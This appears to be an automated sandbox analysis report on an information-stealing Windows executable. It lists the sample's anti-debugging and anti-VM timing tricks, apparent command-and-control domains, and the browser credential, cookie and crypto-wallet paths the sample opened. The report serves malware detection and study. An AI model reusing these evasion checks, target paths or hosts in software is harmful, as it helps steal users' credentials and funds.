              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 311A4A second address: 311A69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007F4668B9A730h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 311B97 second address: 311B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 311E84 second address: 311E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4668B9A726h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 ja 00007F4668B9A726h 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 311E9B second address: 311EAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466925DD9Dh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31214D second address: 31215D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4668B9A726h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31215D second address: 312161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31539A second address: 3153A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3153A0 second address: 3153A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3153A5 second address: 3153BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4668B9A733h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3153BC second address: 3153C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3153C2 second address: 3153F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4668B9A739h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4668B9A730h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3153F7 second address: 315415 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F466925DD96h 0x00000008 jmp 00007F466925DDA4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 315415 second address: 315426 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4668B9A72Dh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 316BCF second address: 316BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 316BD7 second address: 316BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 319A46 second address: 319A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31AE84 second address: 31AE88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5400317 second address: 5400365 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466925DD9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F466925DD9Bh 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 push esi 0x00000012 mov al, bh 0x00000014 pop esi 0x00000015 pushfd 0x00000016 jmp 00007F466925DD9Dh 0x0000001b xor ax, 0E26h 0x00000020 jmp 00007F466925DDA1h 0x00000025 popfd 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54308C4 second address: 54308CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54308CA second address: 5430914 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 45C6636Fh 0x00000008 pushfd 0x00000009 jmp 00007F4668B9A734h 0x0000000e adc eax, 2EBED398h 0x00000014 jmp 00007F4668B9A72Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, esi 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F4668B9A735h 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5430914 second address: 543091A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 543091A second address: 543093C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4668B9A733h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+0Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 543093C second address: 5430942 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5430942 second address: 5430948 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5430948 second address: 543094C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 543094C second address: 5430993 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4668B9A734h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F4668B9A72Dh 0x00000016 sub cx, 96A6h 0x0000001b jmp 00007F4668B9A731h 0x00000020 popfd 0x00000021 push ecx 0x00000022 pop edx 0x00000023 popad 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5430993 second address: 54309D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466925DD9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F46D98BB7A9h 0x0000000f jmp 00007F466925DD9Eh 0x00000014 cmp dword ptr [75AF459Ch], 05h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F466925DDA7h 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54309D8 second address: 5430A15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4668B9A739h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F46D92101C8h 0x0000000f pushad 0x00000010 mov edx, esi 0x00000012 mov eax, 32A8EB7Fh 0x00000017 popad 0x00000018 xchg eax, esi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F4668B9A72Ch 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5430A15 second address: 5430A19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5430A19 second address: 5430A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5430AFF second address: 5430B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5430B07 second address: 5430B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5430B46 second address: 5430B4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 7EB9C instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 219359 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 24289F instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 22BD75 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 7EBA2 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 2A75FB instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
              Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
              Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
              Source: C:\Users\user\Desktop\file.exe TID: 2436 Thread sleep time: -30000s >= -30000s
              Source: C:\Users\user\Desktop\file.exe TID: 6764 Thread sleep time: -30000s >= -30000s
              Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: file.exe, 00000000.00000002.2132501021.00000000001FB000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: file.exe, 00000000.00000003.2060339315.0000000005D3B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696428655p
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: file.exe, 00000000.00000002.2133160668.000000000156E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2133160668.00000000015E1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: file.exe, 00000000.00000002.2133160668.00000000015C3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW^
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: file.exe, 00000000.00000003.2060339315.0000000005D3B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: YNVMware
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
              Source: file.exe, 00000000.00000002.2132501021.00000000001FB000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
              Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

              Anti Debugging

              Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exe File opened: NTICE
              Source: C:\Users\user\Desktop\file.exe File opened: SICE
              Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
              Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
              Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
              Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort

              HIPS / PFW / Operating System Protection Evasion

              Source: file.exe, 00000000.00000003.2010579118.0000000005280000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: scriptyprefej.store
              Source: file.exe, 00000000.00000003.2010579118.0000000005280000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: navygenerayk.store
              Source: file.exe, 00000000.00000003.2010579118.0000000005280000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: founpiuer.store
              Source: file.exe, 00000000.00000003.2010579118.0000000005280000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: necklacedmny.store
              Source: file.exe, 00000000.00000003.2010579118.0000000005280000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: thumbystriw.store
              Source: file.exe, 00000000.00000003.2010579118.0000000005280000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: fadehairucw.store
              Source: file.exe, 00000000.00000003.2010579118.0000000005280000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: crisiwarny.store
              Source: file.exe, 00000000.00000003.2010579118.0000000005280000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: presticitpo.store
              Source: file.exe, 00000000.00000002.2132645968.000000000023F000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Program Manager
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: file.exe, 00000000.00000002.2133160668.00000000015A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: file.exe PID: 6136, type: MEMORYSTR
              Source: Yara match File source: sslproxydump.pcap, type: PCAP
              Source: file.exe String found in binary or memory: %appdata%\Electrum\wallets
              Source: file.exe String found in binary or memory: %appdata%\ElectronCash\wallets
              Source: file.exe String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
              Source: file.exe String found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: file.exe String found in binary or memory: ExodusWeb3
              Source: file.exe String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: file.exe String found in binary or memory: keystore
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflа
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
